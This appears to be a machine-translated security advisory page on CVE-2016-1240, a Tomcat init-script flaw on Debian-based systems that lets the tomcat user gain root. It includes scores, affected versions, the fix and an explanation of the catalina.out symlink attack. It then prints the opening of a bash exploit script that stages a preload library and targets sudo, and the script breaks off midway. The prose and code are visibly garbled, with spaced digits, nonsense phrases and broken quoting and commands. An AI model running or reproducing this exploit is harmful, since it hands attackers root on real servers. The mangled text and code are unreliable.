7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.0004 Low
EPSS
Percentile
8.2%
Will you celebrate the National Day, the Tomcat to 1 0 September 1, exposed the local to mention the right Vulnerability, CVE-2 0 1 6-1 2 4 0 to. Just a Tomcat user with low privileges, the attacker could use the vulnerability to get to the system ROOT privileges. And the vulnerability of the use the difficulty is not large, the affected users need special attention.
Tomcat is running in Apache on the application server, support for running Servlet/JSP application container–can be the Tomcat as an Apache extension, in fact, Tomcat can also be independent of Apache running.
! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 8 1 6 4 2 1 3 2 3 0. png? www. myhack58. com)
Vulnerability ID:
CVE-2 0 1 6-1 2 4 0
Affect range:
Tomcat 8
Tomcat 7
Tomcat 6
Affected systems include Debian, Ubuntu, other use the corresponding deb package system may also be affected.
Repair solutions:
The Debian security team has fixed the affected packages; the update to the system to provide the latest version of the Tomcat package to.
Vulnerability overview:
Debian system on Linux administrators typically use apt-get for package management, the CVE-2 0 1 6-1 2 4 0 This is a vulnerability which is the problem in Tomcat deb package,make the deb package to install Tomcat program automatically as administrator to install a startup script:/etc/init. d/tocat* use the script, can lead to an attacker through a low-permissions of the Tomcat user to get system root permission!
set +e
touch “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina. out
chown $TOMCAT7_USER “$CATALINA_PID” “$CATALINA_BASE”/logs/catalina. out
A local attacker, as the tomcat user, for example, through web application vulnerabilities to the catalina. out modified to point to any file system links, once the Tomcat init script with ROOT permissions running in the service after the restart again open the catalina. out file, the attacker can obtain ROOT privileges.
Vulnerability PoC of:
#!/ bin/bash
BACKDOORSH=“/bin/bash”
BACKDOORPATH=“/tmp/tomcatrootsh”
PRIVESCLIB=“/tmp/privesclib. so”
PRIVESCSRC=“/tmp/privesclib. c”
SUIDBIN=“/usr/bin/sudo”
function cleanexit {
echo-e “\n[+] Cleaning up…”
rm-f $PRIVESCSRC
rm-f $PRIVESCLIB
rm-f $TOMCATLOG
touch $TOMCATLOG
if [ -f /etc/ld. so. preload ]; then
echo-n > /etc/ld. so. preload 2>/dev/null
fi
echo-e “\n[+] Job done. Exiting with code $1 \n”
exit $1
}
function ctrl_c() {
echo-e “\n[+] Active exploitation aborted. Remember you can use-deferred switch for deferred exploitation.”
cleanexit 0
}
#intro
echo-e “\0 3 3[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2 0 1 6-1 2 4 0\n”
echo-e “Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers. com \0 3 3[0m”
if [ $# -lt 1 ]; then
echo-e “\n[!] Exploit usage: \n\n$0 path_to_catalina. out [-deferred]\n”
exit 3
fi
if [ “$2” = “-deferred” ]; then
mode=“deferred”
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
0.0004 Low
EPSS
Percentile
8.2%